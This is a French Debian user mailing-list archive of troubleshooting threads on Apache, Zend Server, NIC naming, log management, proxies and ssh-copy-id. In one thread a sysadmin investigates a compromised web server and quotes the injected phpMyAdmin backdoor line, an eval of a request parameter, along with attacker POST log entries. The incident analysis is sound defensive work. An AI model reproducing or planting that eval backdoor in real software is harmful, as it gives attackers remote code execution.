Re: changement de numéro de carte après clonage
Le 28/06/2011 14:08, Olivier Pavilla a écrit : Bonjour. Sur un serveur, j'ai fait l'image du disk dur avec DD que j'ai sauvegardé sur un NAS. J'ai ensuite descendu cette image sur un autre serveur (même modèle, même type, même cpu, même quantité de RAM, même type et marque de disk dur). Sauf que sur le serveur sur lequel j'ai descendu l'image disque. Maintenant, j'ai un eth2 et un eth3 Pas moyen de revenir à un renommage des cartes en eth0 eth1. Quel fichier dois éditer pour revenir à eth0 et eth1? -- Savez-vous ce que signifie MICROSOFT? Most Intelligent Customers Realize Our Software Only (for) Fools () Teenagers. http://www.linux-squad.com Regarde dans /etc/udev/rules.d/70-persistent-net.rules Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4e09c569.7060...@audaxis.com
[HS] Gestion des logs
Bonjour la liste :) ! Aujourd'hui je me pose la question de savoir si ce serait bien de centraliser l'ensemble des logs de mes serveurs sur un seul serveur, dans une db mysql par exemple. L'avantage serait la simplicité d'analyse, afin de détecter les éventuels problèmes. Pour l'instant, j'ai un logwatch qui tourne quotidiennement par serveur, mais je reçois environ 150 rapports par jour, et avec le temps je ne les lis plus... D'autant plus que lorsque j'y jette un coup d'œil, il n'y a jamais rien de bizarre. J'ai cherché un peu d'autres analyseurs de logs, qui n'enverrait par exemple un rapport que lorsqu'une anomalie serait détectée, et je suis tombé sur logcheck qui m'a l'air pas mal. Donc voilà, avant d'aller plus en avant, j'aimerais avoir vos retours d'expérience sur la gestion des logs de vos linux box. 1°) Pour ou contre la centralisation des logs (et si vous connaissez des outils :) ) 2°) Les outils que vous utilisez pour monitorer vos logs, remonter les évènements douteux, etc... Et merci ! Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4e087735.6090...@audaxis.com
Re: [HS] Serveur corrompu, besoin de conseil
Le 15/06/2011 10:47, bruno.deb...@cyberoso.com a écrit : Le Wed, 15 Jun 2011 10:15:04 +0200, Romaric DEFAUXr...@audaxis.com a écrit : Salut la liste ! J'aurai besoin de conseil. On a un serveur corrompu (on en est sûr à 99% qu'il est corrompu). C'est un serveur web Ubuntu 8.04.4 LTS. Voici les symptômes : - des fichiers php sont modifiés tous les 4h : la balise php ouvrante est remplacée par : ?php eval(base64_decode( suivi de code en base 64 - des process qui ne devraient pas font des connections vers notre ldap : tcp1 0 192.168.2.201:51954 192.168.2.182:389 CLOSE_WAIT 6333/postgres tcp0 0 192.168.2.201:41109 192.168.2.182:389 TIME_WAIT - tcp1 0 192.168.2.201:51946 192.168.2.182:389 CLOSE_WAIT 6256/mysqld tcp0 0 192.168.2.201:41110 192.168.2.182:389 TIME_WAIT - tcp1 0 192.168.2.201:51963 192.168.2.182:389 CLOSE_WAIT 6384/nrpe - des process cachés sont découverts avec unhide (ce sont peut-être des faux positifs ?) unhide brute Unhide 02-11-2007 yje...@security-projects.com [*]Starting scanning using brute force against PIDS Found HIDDEN PID: 1875 Found HIDDEN PID: 11836 Found HIDDEN PID: 19403 Found HIDDEN PID: 22328 Found HIDDEN PID: 22333 Found HIDDEN PID: 22541 Les pid changent. On ne sait pas comment c'est arrivé (mais on suppose via un joomla ou un wordpress), du coup on craint qu'une réinstallation totale ne serve à rien. Est-ce que vous auriez des conseils à donner ? Etant donné que c'est un serveur de prod, on ne l'a pas encore isolé du réseau. Merci d'avance Romaric Bonjour, Cherche dans les logs d'apache les requetes POST. Ces scripts sont souvent commandés à distance. Sinon, cherche des fichiers php dans les répertoire où les utilisateurs peuvent uploader (et plus globalement là où ils ne devraient pas y en avoir). Tu peux aussi, si tu as les sources quelque part, comparer les arborescences. Bon courage Bruno C'est bon on a trouvé d'où ça vient. Et c'est moins grave que ce qu'on pensait (ouf !). Le serveur n'a pas été compromis (on en est sûr à 99%), le pirate aurait plutôt utilisé une faille dans un phpmyadmin. J'ai trouvé effectivement des POST intéressants dans les logs d'apache : cd /var/log/apache2 cat *.log | grep 'POST' /root/analyse.txt cd root Ensuite j'ai cherché quels étaient les post fait à cette heure ci : cat analyse.txt | grep -i ':08:34' Deux lignes m'ont interpellées : 75.67.197.129 - - [14/Jun/2011:08:34:29 +0200] POST /phpmyadmin/config/config.inc.php HTTP/1.1 200 19 - Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2; 60.28.179.32 - - [15/Jun/2011:08:34:51 +0200] POST /phpmyadmin/config/config.inc.php HTTP/1.1 200 19 - Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2; vim /µ../phpmyadmin/config/config.inc.php: ?php /* * Generated configuration file * Generated by: phpMyAdmin 2.11.8.1 setup script by Michal Čihař mic...@cihar.com * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $ * Date: Sun, 12 Jun 2011 06:44:58 GMT */ /* Servers configuration */ $i = 0; /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host']=''; if(isset(\$_REQUEST['asc']))eval(stripslashes(\$_REQUEST['asc']));//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ ? La ligne if(isset(\$_REQUEST['asc']))eval(stripslashes(\$_REQUEST['asc']));//'] = 'localhost'; est clairement suspecte. Bref, j'ai fini par trouver que c'était ça : http://www.whitefirdesign.com/resources/jfgjfr5jdfjvvcc-malware.html Romaric smime.p7s Description: S/MIME Cryptographic Signature
[HS] Serveur corrompu, besoin de conseil
Salut la liste ! J'aurai besoin de conseil. On a un serveur corrompu (on en est sûr à 99% qu'il est corrompu). C'est un serveur web Ubuntu 8.04.4 LTS. Voici les symptômes : - des fichiers php sont modifiés tous les 4h : la balise php ouvrante est remplacée par : ?php eval(base64_decode( suivi de code en base 64 - des process qui ne devraient pas font des connections vers notre ldap : tcp1 0 192.168.2.201:51954 192.168.2.182:389 CLOSE_WAIT 6333/postgres tcp0 0 192.168.2.201:41109 192.168.2.182:389 TIME_WAIT - tcp1 0 192.168.2.201:51946 192.168.2.182:389 CLOSE_WAIT 6256/mysqld tcp0 0 192.168.2.201:41110 192.168.2.182:389 TIME_WAIT - tcp1 0 192.168.2.201:51963 192.168.2.182:389 CLOSE_WAIT 6384/nrpe - des process cachés sont découverts avec unhide (ce sont peut-être des faux positifs ?) unhide brute Unhide 02-11-2007 yje...@security-projects.com [*]Starting scanning using brute force against PIDS Found HIDDEN PID: 1875 Found HIDDEN PID: 11836 Found HIDDEN PID: 19403 Found HIDDEN PID: 22328 Found HIDDEN PID: 22333 Found HIDDEN PID: 22541 Les pid changent. On ne sait pas comment c'est arrivé (mais on suppose via un joomla ou un wordpress), du coup on craint qu'une réinstallation totale ne serve à rien. Est-ce que vous auriez des conseils à donner ? Etant donné que c'est un serveur de prod, on ne l'a pas encore isolé du réseau. Merci d'avance Romaric smime.p7s Description: S/MIME Cryptographic Signature
Re: pc qui s'éteint d'un coup
Le 24/05/2011 15:31, cor...@free.fr a écrit : Bonjour, Sur mon PC (AMD dual core 64 bits), avec Lenny 32 bits, qui a toujours bien marché, j'ai rajouté une barette RAM de 256 Mo (en plus de 2 barettes de 1 Go chacune). La RAM est bien reconnue par le BIOS. Juste après, au boot de Grub, je dois modifier le n° du disque dur : (hd1,0) par (hd2,0) pourquoi ... ? quid ? , quel rapport avec la RAM ? Le PC possède 3 disques durs : hda (ide), sda (sata) et sdb (sata) Change ta conf de grub /boot/grub/menu.lst Puis le PC boote bien, aucun problème, et il s'éteint d'un coup au bout de 15 minutes. Le ventilateur est mort (peut-être). Ton CPU chauffe trop et ta machine s'arrête pour le protéger. Ca m'est arrivé plus d'une fois. J'ai évidemment retiré la barette RAM de 256 Mo, Grub refonctionne comme avant : (hd1,0), mais malgré tout, le problème persiste : arrêt brutal au bout de 15 minutes. Avez vous une idée ? (car j'ai un besoin urgent de mon PC !) Merci. De rien Romaric smime.p7s Description: S/MIME Cryptographic Signature
Re: [nouveau squeeze] Problème démarrage apache2
Le 07/02/2011 17:42, Franck Delage a écrit : J'a des choses en plus : Losrque je redémarre zend-server, j'ai ça dans /var/log/apache2/error.log : 07.02.2011 17:35:19 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_datacache_rotationSem091510113742 : Permission denied [ 07.02.2011 17:35:19 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_zend_cache_shmstorage.key091510113742 : Permission denied [ 07.02.2011 17:35:19 ERROR] ZShmStorage(): Fatal error: failed to allocate semaphore. [ 07.02.2011 17:35:19 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_ConfigurationChangedEvent091510113742 : Permission denied [ 07.02.2011 17:35:19 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_RestartAgentSem091510113742 : Permission denied [ 07.02.2011 17:35:19 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_RestartAgentSem091510113742 : Permission denied [ 07.02.2011 17:35:22 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_datacache_rotationSem091510113742 : Permission denied [ 07.02.2011 17:35:22 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_zend_cache_shmstorage.key091510113742 : Permission denied [ 07.02.2011 17:35:22 ERROR] ZShmStorage(): Fatal error: failed to allocate semaphore. [ 07.02.2011 17:35:22 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_ConfigurationChangedEvent091510113742 : Permission denied [ 07.02.2011 17:35:22 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_RestartAgentSem091510113742 : Permission denied [ 07.02.2011 17:35:22 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_RestartAgentSem091510113742 : Permission denied [ 07.02.2011 17:40:18 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_datacache_rotationSem091510113742 : Permission denied [ 07.02.2011 17:40:18 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_zend_cache_shmstorage.key091510113742 : Permission denied [ 07.02.2011 17:40:18 ERROR] ZShmStorage(): Fatal error: failed to allocate semaphore. [ 07.02.2011 17:40:18 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_ConfigurationChangedEvent091510113742 : Permission denied [ 07.02.2011 17:40:18 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_RestartAgentSem091510113742 : Permission denied [ 07.02.2011 17:40:18 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_RestartAgentSem091510113742 : Permission denied [ 07.02.2011 17:40:20 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_datacache_rotationSem091510113742 : Permission denied [ 07.02.2011 17:40:20 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_zend_cache_shmstorage.key091510113742 : Permission denied [ 07.02.2011 17:40:20 ERROR] ZShmStorage(): Fatal error: failed to allocate semaphore. [ 07.02.2011 17:40:20 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_ConfigurationChangedEvent091510113742 : Permission denied [ 07.02.2011 17:40:20 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_RestartAgentSem091510113742 : Permission denied [ 07.02.2011 17:40:20 WARNING] ZSemaphoreImpl::constructor: failed to open file /usr/local/zend/tmp/zsemfile_RestartAgentSem091510113742 : Permission denied Ici, c'est bien un problème de droit : Permission denied Une fois le répertoire /usr/local/zend/tmp créé, et avec les bons droits, est-ce que le démarrage s'effectue ? As-tu d'autres erreurs dans les logs ? Romaric smime.p7s Description: S/MIME Cryptographic Signature
Re: [nouveau squeeze] Problème démarrage apache2
Le 07/02/2011 11:31, Franck Delage a écrit : Le 7 février 2011 11:21, Jean-Michel OLTRA jm.oltra.antis...@espinasse.net a écrit : Tu dois avoir une option de débogage, sur httpd. Et... Comment je la mets en oeuvre ? Je n'ai jamais eu aucun souci avec apache. strace -fv -o debug /etc/init.d/apache2 restart Puis tu lis le fichier debug, c'est assez compréhensible, tu devrais voir où ça bloque Romaric smime.p7s Description: S/MIME Cryptographic Signature
Re: [nouveau squeeze] Problème démarrage apache2
Le 07/02/2011 12:08, Franck Delage a écrit :
apachectl -X
Ça me donne :
/usr/sbin/apachectl: line 107: 5538 Segmentation fault $HTTPD
${APACHE_ARGUMENTS} $ARGV
Action '-X' failed.
The Apache error log may have more information.
Et rien dans /var/log/apache2/error.log
Ce serait pas un problème de droit sur les fichiers de log ?
Sinon par rapport au strace, regardes vers la fin, tu devrais voir si il
y a des problèmes d'écriture/lecture.
Romaric
smime.p7s
Description: S/MIME Cryptographic Signature
Re: [nouveau squeeze] Problème démarrage apache2
Le 07/02/2011 12:32, Franck Delage a écrit : Ce serait pas un problème de droit sur les fichiers de log ? Tu veux dire sur access.log et error.log de /var/log/apache2 ? Oui, ton serveur a-t-il le droit d'écriture dessus ? Pour faire un test, met 777 (oui je sais c'est mal) sur le répertoire et les fichiers, pour voir si il démarre. Sinon par rapport au strace, regardes vers la fin, tu devrais voir si il y a des problèmes d'écriture/lecture. J'ai relancé ta commande strace, mais ça prend des plombes... Si la commande ne s'arrete pas, c'est que le processus qu'il observe ne s'arrête pas. Sinon, si tu peux mettre le fichier de debug à disposition quelque part (ftp ou autre), je veux bien y jeter un oeil voir si je détecte un problème Romaric smime.p7s Description: S/MIME Cryptographic Signature
Re: [nouveau squeeze] Problème démarrage apache2
Le 07/02/2011 13:39, Franck Delage a écrit : Info supplémentaire : lorsque je redémarre zend-server : $ /usr/local/zend/bin/zendctl.sh restart Restarting Zend Server 5.0.4 .. [/usr/local/zend/bin] httpd (no pid file) not running httpd (no pid file) not running Stopping Zend Server GUI [Lighttpd] [OK] httpd (no pid file) not running (98)Address already in use: make_sock: could not bind to address [::]:80 (98)Address already in use: make_sock: could not bind to address 0.0.0.0:80 no listening sockets available, shutting down Unable to open logs Action 'start' failed. The Apache error log may have more information. spawn-fcgi: child spawned successfully: PID: 14986 Starting Zend Server GUI [Lighttpd] [OK] [ 07.02.2011 13:37:52 SYSTEM] watchdog for lighttpd is running. [ 07.02.2011 13:37:52 SYSTEM] lighttpd is running. Zend Server started... Franck. J'ai regardé dans le fichier de debug, il y a de nombreux EBADF (Bad file descriptor). Le process qui provoque ces erreurs est celui là : 8284 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb744a768) = 8392 Je suppose que c'est quand apache fork pour se mettre en daemon, mais j'avoue que ça dépasse mes compétences :). Quand j'utilise strace généralement ça me permet de détecter des problèmes plus évidents (par exemple mauvais droits sur des fichiers). Je n'utilise pas zend, mais l'erreur que tu mets ci-dessus me donne l'impression que tu as deux serveurs web (apache et lighttpd) qui essaie de tourner sur le même port. Si tu arrêtes lighttpd, est-ce que apache démarre ? Romaric smime.p7s Description: S/MIME Cryptographic Signature
Re: [nouveau squeeze] Problème démarrage apache2
Le 07/02/2011 14:37, Franck Delage a écrit : Autre info : # netstat -lataupen | grep 80 tcp0 0 0.0.0.0:19150 0.0.0.0:* LISTEN 13480342896/gkrellmd tcp6 0 0 :::19150:::* LISTEN 13480352896/gkrellmd udp0 0 0.0.0.0:111 0.0.0.0:* 0 58091666/portmap Donc, je suppose que le port 80 n'est pas utilisé... Contrairement à ce que me dit zend-server quand je le redémarre : (98)Address already in use: make_sock: could not bind to address [::]:80 (98)Address already in use: make_sock: could not bind to address 0.0.0.0:80 Enfin, si je comprend bien... Et tu as regardé du côté des droits sur les logs ? - Unable to open logs Parce que j'ai déjà eu le problème où apache ne démarrait pas parce qu'il n'avait pas les droits d'écriture sur les logs... Je suis à court d'idée après cela. Romaric smime.p7s Description: S/MIME Cryptographic Signature
Re: [nouveau squeeze] Problème démarrage apache2
Le 07/02/2011 17:08, Franck Delage a écrit : Je rappelle le message de zend, y compris dans l'install par aptitude : Starting Zend Server 5.0.4 .. (98)Address already in use: make_sock: could not bind to address [::]:80 (98)Address already in use: make_sock: could not bind to address 0.0.0.0:80 no listening sockets available, shutting down Unable to open logs Action 'start' failed. The Apache error log may have more information. spawn-fcgi: socket is already in use, can't spawn lighttpd watchdog is up and running.. [OK] [ 07.02.2011 17:00:49 SYSTEM] watchdog for lighttpd is running. [ 07.02.2011 17:00:49 SYSTEM] lighttpd is running. Zend Server started... Et quand zend est démarré, le netstat t'affiche quoi ? Le port 80 est-il utilisé ? Romaric smime.p7s Description: S/MIME Cryptographic Signature
Re: Liste Debian 2x plus de mails!
Le 21/12/2010 09:51, Fabien LUCE a écrit : Bonjour à tous, est ce que quelqu'un rencontrerai le même pb que moi aveccette liste de discussion? Je recois deux fois chaque mail envoyé par un membre? Quelle est le pb/solution? Je précise que je ne rencontre par le pb avec les autres listes de discussions auxquelle je suis abonné. J'utilise Mutt comme client. Merci Je n'ai pas ce problème... Te serais-tu inscrit deux fois :) ? Romaric smime.p7s Description: S/MIME Cryptographic Signature
Re: update upgrade parc serveurs
Manu a écrit : Hello, Je gère un parc de plusieurs dizaines de serveurs sous debian stable. A ce jour je mets à jour les serveurs 1 par 1 à la mano. Je souhaite savoir si il existe une solution pour mettre à jour tout le parc serveur depuis un master (taper une seul commande qui s'aplique sur l'ensemble du parc). Connaissez vous une solition correspondant à cette fonction au combien pratique. Merci pour votre savoir. Salut Manu, Tu peux voir du côté de puppet (http://www.puppetlabs.com/). C'est peut-être un peu gros pour tes besoins si tu dois juste faire des mises à jour, mais pour moi c'est vraiment devenu un outil indispensable à la gestion du parc (je gère une centaine de serveurs...) Et il permet entre autre de faire les mises à jour, mais bien plus :) ! Si ça t'intéresse, le meilleur tuto que j'ai trouvé dessus : http://www.devco.net/pubwiki/Puppet/GettingStarted Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4c6cf44b.5090...@audaxis.com
[Un peu HS?] Accès FTP et proxy
Salut à tous, Pour protéger des machines windows, je mets en place un serveur proxy, le but étant de faire en sorte qu'elles ne soient plus accessible directement depuis internet. Pour tout ce qui est du flux HTTP, pas de souci, j'utilise apache avec le mod-proxy et le mod-security pour sécuriser un peu le tout (ce n'est peut-être pas la meilleure solution mais pour l'instant ça fonctionne bien) Je suis en train de voir comment faire pour le FTP. Déjà, je me trouve face à deux possibilités : - soit faire des montages de mes partitions windows sur le serveur proxy et mettre un serveur FTP normal sur le proxy (j'ai un peu peur de rencontrer des difficultés au niveau des droits...) - soit mettre en place un proxy FTP, qui selon l'utilisateur (par exemple, mais cela implique qu'il ne doit pas y avoir deux fois le même utilisateur...), redirigerait le flux FTP vers le bon serveur (j'ai regardé un peu les possibilité de ftp-proxy, apache, squid... à ce niveau là) Déjà, l'un d'entre vous s'est-il retrouvé face à cette problématique ? Laquelle des deux solutions (ou une autre pourquoi pas :) vous me conseilleriez (Je penche personnellement plutôt pour la première...) ? Merci d'avance Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4c5ab1b6.5020...@audaxis.com
Re: [Un peu HS?] Accès FTP et proxy
jocelyn.jud...@laposte.net a écrit : Le jeudi 05 août 2010 à 14:42 +0200, Romaric DEFAUX a écrit : Salut à tous, Pour protéger des machines windows, je mets en place un serveur proxy, le but étant de faire en sorte qu'elles ne soient plus accessible directement depuis internet. Pour tout ce qui est du flux HTTP, pas de souci, j'utilise apache avec le mod-proxy et le mod-security pour sécuriser un peu le tout (ce n'est peut-être pas la meilleure solution mais pour l'instant ça fonctionne bien) Je suis en train de voir comment faire pour le FTP. Déjà, je me trouve face à deux possibilités : - soit faire des montages de mes partitions windows sur le serveur proxy et mettre un serveur FTP normal sur le proxy (j'ai un peu peur de rencontrer des difficultés au niveau des droits...) - soit mettre en place un proxy FTP, qui selon l'utilisateur (par exemple, mais cela implique qu'il ne doit pas y avoir deux fois le même utilisateur...), redirigerait le flux FTP vers le bon serveur (j'ai regardé un peu les possibilité de ftp-proxy, apache, squid... à ce niveau là) Déjà, l'un d'entre vous s'est-il retrouvé face à cette problématique ? Laquelle des deux solutions (ou une autre pourquoi pas :) vous me conseilleriez (Je penche personnellement plutôt pour la première...) ? Merci d'avance Romaric je veux bien que tu utilise windows mes sais du libre con utilise il on assai de pub comme sa sen polluer les site libre je suis parmi se qui travail sur du libre heu... Mon proxy tourne avec ubuntu server. Je n'avais pas pensé à la préciser (parce que je pensais apache + mod-security + ftp-proxy + squid... = linux dans ma tête :) Quand je parle de montage de mes partitions windows sur le proxy, je pense à samba et des choses comme ça (d'où les potentiels problèmes de droit ?). -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4c5ad96c.7020...@audaxis.com
Re: [HS] Apache en reverse proxy devant IIS
Romaric DEFAUX a écrit : Jean-Yves F. Barbier a écrit : Le Tue, 06 Jul 2010 17:36:02 +0200, Romaric DEFAUX r...@audaxis.com a écrit : Salut à tous, J'ai mis apache en reverse proxy devant mon serveur IIS, et maintenant les urls qui contiennent des accents (graves ou aigus) ne sont plus trouvées... J'ai essayé de modifié le adddefaultcharset (à utf-8, à ISO-8859-15, à off), mais rien n'y fait... Vous auriez une piste, de quelles infos avez-vous besoin ? a2enmod recode? # a2enmod Which module would you like to enable? Your choices are: actions alias asis auth_basic auth_digest authn_alias authn_anon authn_dbd authn_dbm authn_default authn_file authnz_ldap authz_dbm authz_default authz_groupfile authz_host authz_owner authz_user autoindex cache cern_meta cgi cgid charset_lite dav dav_fs dav_lock dbd deflate dir disk_cache dump_io env expires ext_filter file_cache filter headers ident imagemap include info ldap log_forensic mem_cache mime mime_magic mod_security2 negotiation php5 proxy proxy_ajp proxy_balancer proxy_connect proxy_ftp proxy_http rewrite setenvif speling ssl status substitute suexec unique_id userdir usertrack version vhost_alias Je n'ai pas le mod recode... Tu fais peut-être référence à php5-recode ? Mais je n'utilise pas le php... Une autre piste ? Au passage : Server version: Apache/2.2.8 (Ubuntu) Merci ^^ Bah en fait le problème ne venait pas du proxy apache... Désolé pour le bruit, c'était urlscan sur le serveur window$ qui bloquait les appels aux urls qui contenaient des caractères en utf-8... :( -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4c35be5d.4000...@audaxis.com
Re: [HS] Apache en reverse proxy devant IIS
Jean-Yves F. Barbier a écrit : Le Tue, 06 Jul 2010 17:36:02 +0200, Romaric DEFAUX r...@audaxis.com a écrit : Salut à tous, J'ai mis apache en reverse proxy devant mon serveur IIS, et maintenant les urls qui contiennent des accents (graves ou aigus) ne sont plus trouvées... J'ai essayé de modifié le adddefaultcharset (à utf-8, à ISO-8859-15, à off), mais rien n'y fait... Vous auriez une piste, de quelles infos avez-vous besoin ? a2enmod recode? # a2enmod Which module would you like to enable? Your choices are: actions alias asis auth_basic auth_digest authn_alias authn_anon authn_dbd authn_dbm authn_default authn_file authnz_ldap authz_dbm authz_default authz_groupfile authz_host authz_owner authz_user autoindex cache cern_meta cgi cgid charset_lite dav dav_fs dav_lock dbd deflate dir disk_cache dump_io env expires ext_filter file_cache filter headers ident imagemap include info ldap log_forensic mem_cache mime mime_magic mod_security2 negotiation php5 proxy proxy_ajp proxy_balancer proxy_connect proxy_ftp proxy_http rewrite setenvif speling ssl status substitute suexec unique_id userdir usertrack version vhost_alias Je n'ai pas le mod recode... Tu fais peut-être référence à php5-recode ? Mais je n'utilise pas le php... Une autre piste ? Au passage : Server version: Apache/2.2.8 (Ubuntu) Merci ^^ -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4c3497ea.6020...@audaxis.com
[HS] Apache en reverse proxy devant IIS
Salut à tous, J'ai mis apache en reverse proxy devant mon serveur IIS, et maintenant les urls qui contiennent des accents (graves ou aigus) ne sont plus trouvées... J'ai essayé de modifié le adddefaultcharset (à utf-8, à ISO-8859-15, à off), mais rien n'y fait... Vous auriez une piste, de quelles infos avez-vous besoin ? D'avance merci Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4c334d62.3080...@audaxis.com
Remonter l'amelioration d'un paquet aux developpeurs Debian
Salut à tous,
Il y avait un bug dans le script :
ssh-copy-id
Si il était lancé plusieurs fois la clé était copiée plusieurs fois (ce
qui est inutile à mon sens, d'où le fait que je dis que c'est un bug).
J'ai corrigé cela en remplaçant (ligne 41):
{ eval $GET_ID ; } | ssh $1 umask 077; test -d .ssh || mkdir .ssh ;
cat .ssh/authorized_keys || exit 1
par
{ eval $GET_ID ; } | ssh $1 umask 077; test -d .ssh || mkdir .ssh ;
cat .ssh/authorized_keys; cat .ssh/authorized_keys | sort | uniq
/tmp/sshcopy.tmp; mv /tmp/sshcopy.tmp .ssh/authorized_keys || exit 1
Avantage : cela n'ajoute pas la clé si elle est déjà dedans
Désavantage : ça trie le fichier authorized_keys
Ce n'est peut-être pas la manière la plus propre de le faire mais ça
marche bien.
Je souhaiterai proposer cette petite modification aux développeurs de
Debian, est-ce qu'il y a un moyen simple de le faire ? En envoyant un
mail à une adresse spécifique par exemple...
Merci
--
Romaric Defaux
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists
Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe
vers debian-user-french-requ...@lists.debian.org
En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
Archive: http://lists.debian.org/4c10b1bb.9060...@audaxis.com
Re: Remonter l'amelioration d'un paquet aux developpeurs Debian
Julien a écrit : Le jeudi 10 juin 2010 à 11:34 +0200, Romaric DEFAUX a écrit : Salut à tous, Il y avait un bug dans le script : ssh-copy-id Si il était lancé plusieurs fois la clé était copiée plusieurs fois (ce qui est inutile à mon sens, d'où le fait que je dis que c'est un bug). Je souhaiterai proposer cette petite modification aux développeurs de Debian, est-ce qu'il y a un moyen simple de le faire ? En envoyant un mail à une adresse spécifique par exemple... Il faut d'abord trouver le paquet en question : $ apt-file search ssh-copy-id openssh-client: /usr/bin/ssh-copy-id openssh-client: /usr/share/man/man1/ssh-copy-id.1.gz il s'agit du paquet openssh-client : http://packages.debian.org/lenny/openssh-client http://packages.qa.debian.org/o/openssh.html Tu as des liens vers les développeurs du paquet avec leur adresse mail. Est-ce qu'il faut reporter un bug ou leur envoyer un mail pour modifications ? Je ne sais pas trop... Julien Merci ! Je vais leur envoyer un mail pour leur proposer. Bonne journée ! -- Romaric Defaux -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4c10bd56.7080...@audaxis.com
Re: [mysql] passer de myisam a innodb
GanGan a écrit : bonjour les amis !! j'ai un truc farfelu a faire transformer : une base mysql avec des tables myisam qui faudrai que je transforme en innodb comment feriez vous ça ? la base est en prod :s j'ai bien une idée mais y a peut etre mieux. Juste deux p'tits conseils, avant de modifier tes tables (on sait jamais) : - l'option innodb_file_per_table permet d'éviter d'avoir 1 seul gros fichier - fait attention à la manière dont tu fais tes backups (si tu en fais :D ), si tu copies juste les fichiers de /var/lib/mysql je te conseillerais plutôt d'utiliser mysqldump à l'avenir ;) A+ Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
[HS] Fichier /bin/gzip qui change sans cesse (ouverture de l'enquete)
